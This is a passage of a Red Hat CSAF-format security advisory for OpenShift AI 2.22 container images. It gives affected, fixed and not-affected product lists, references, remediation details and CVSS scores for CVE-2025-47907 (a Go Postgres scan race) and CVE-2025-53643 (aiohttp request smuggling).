"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-53643",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2025-07-14T21:00:57.122280+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2380000"
}
],
"notes": [
{
"category": "description",
"text": "A request smuggling flaw was found in the aiohttp python library. If a pure Python version of aiohttp is installed, without the usual C extensions, for example, or if AIOHTTP_NO_EXTENSIONS is enabled, an attacker can execute a request smuggling attack to bypass certain firewalls or proxy protections.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP HTTP Request/Response Smuggling",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
